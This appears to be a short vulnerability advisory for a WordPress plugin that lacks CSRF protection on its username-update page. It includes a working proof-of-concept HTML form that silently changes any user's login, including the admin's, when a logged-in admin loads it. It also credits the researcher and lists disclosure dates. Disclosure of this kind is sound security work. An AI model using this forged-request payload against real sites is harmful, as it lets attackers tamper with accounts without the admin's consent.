The plugin does not implement CSRF checks, which could allow attackers to make a logged in admin change any user's username includes the admin
<html> <body> <form action="https://example.com/wp-admin/admin.php?page=eup_username_update&update=3" method="POST"> <input type="hidden" name="user_login" value="newusername" /> <input type="hidden" name="submit" value="Update Username" /> <input type="submit" value="Submit request" /> </form> </body> </html>
Raad Haddad of Cloudyrion GmbH
Raad Haddad of Cloudyrion GmbH
Yes
2022-07-18 (about 6 months ago)
2022-07-18 (about 6 months ago)
2022-08-22 (about 5 months ago)